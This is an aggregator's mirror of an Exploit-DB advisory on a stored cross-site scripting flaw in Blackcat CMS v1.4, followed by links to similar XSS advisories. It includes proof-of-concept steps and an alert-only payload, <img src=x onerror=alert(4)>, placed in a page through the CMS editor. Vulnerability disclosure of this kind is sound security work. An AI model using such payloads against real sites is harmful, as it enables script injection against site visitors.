3

[webapps] Blackcat Cms v1.4 - Stored XSS

1 year ago

source link: https://www.exploit-db.com/exploits/51604
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

neoserver,ios ssh client

Blackcat Cms v1.4 - Stored XSS

EDB-ID:

51604

EDB Verified:

Platform:

PHP

Date:

2023-07-19

Vulnerable App:

Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1

Recommend

15
- www.exploit-db.com 1 year ago
- Cache
[webapps] Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)
Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) ...
7
- www.exploit-db.com 1 year ago
- Cache
[webapps] PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) ...
4
- www.exploit-db.com 1 year ago
- Cache
[webapps] pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
pluck v4.7.18 - Stored Cross-Site Scripting (XSS) ...
6
- www.exploit-db.com 1 year ago
- Cache
[webapps] TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS) ...
5
- www.exploit-db.com 1 year ago
- Cache
[webapps] RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) ...
4
- www.exploit-db.com 1 year ago
- Cache
[webapps] Zenphoto 1.6 - Multiple stored XSS
Zenphoto 1.6 - Multiple stored XSS ...
7
- www.exploit-db.com 1 year ago
- Cache
[webapps] projectSend r1605 - Stored XSS
projectSend r1605 - Stored XSS
2
- www.exploit-db.com 1 year ago
- Cache
[webapps] Webedition CMS v2.9.8.8 - Stored XSS
Webedition CMS v2.9.8.8 - Stored XSS ...
2
- www.exploit-db.com 5 months ago
- Cache
[webapps] SPA-CART CMS - Stored XSS
SPA-CART CMS - Stored XSS ...
5
- www.exploit-db.com 5 months ago
- Cache
[webapps] Backdrop CMS 1.23.0 - Stored XSS
Backdrop CMS 1.23.0 - Stored XSS ...

About Joyk

Aggregate valuable and interesting links.
Joyk means Joy of geeK